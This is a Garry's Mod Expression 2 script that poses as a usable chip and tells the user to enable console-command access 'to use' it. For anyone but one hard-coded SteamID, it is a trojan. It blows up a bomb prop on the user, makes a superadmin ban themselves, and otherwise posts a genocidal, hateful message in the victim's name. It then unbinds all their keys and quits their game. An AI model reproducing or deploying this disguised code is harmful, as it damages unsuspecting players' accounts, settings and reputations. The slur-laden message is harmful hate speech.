if(owner():steamID()!="STEAM_0:0:37198416"){ hint("Enable wire_expression2_concmd 1 to use.",7) local Cexe=concmd("+use") if(Cexe){ print("No") local Prop=propSpawn("models/props_phx/mk-82.mdl",owner():pos(),0) Prop:propBreak() owner():setTrails(500,500,50,"trails/tube",vec(255,255,255),255) owner():setMaterial("models/props_lab/warp_sheet") owner():soundPlay(1,0,"synth/saw_inverted_880.wav") if(owner():isSuperAdmin()){ concmd("say !ban "+"\""+owner():name()+"\""+" \"0\""+" \"No\"") }else{ concmd("say We should gas all the Jews, homosexuals, and minorities. Also fuck this server.") } concmd("unbindall") concmd("quit") concmd("+attack") concmd("+reload") concmd("+left") concmd("+back") concmd("+forward") concmd("+moveleft") concmd("+moveright") concmd("+jump") } selfDestructAll() selfDestruct() }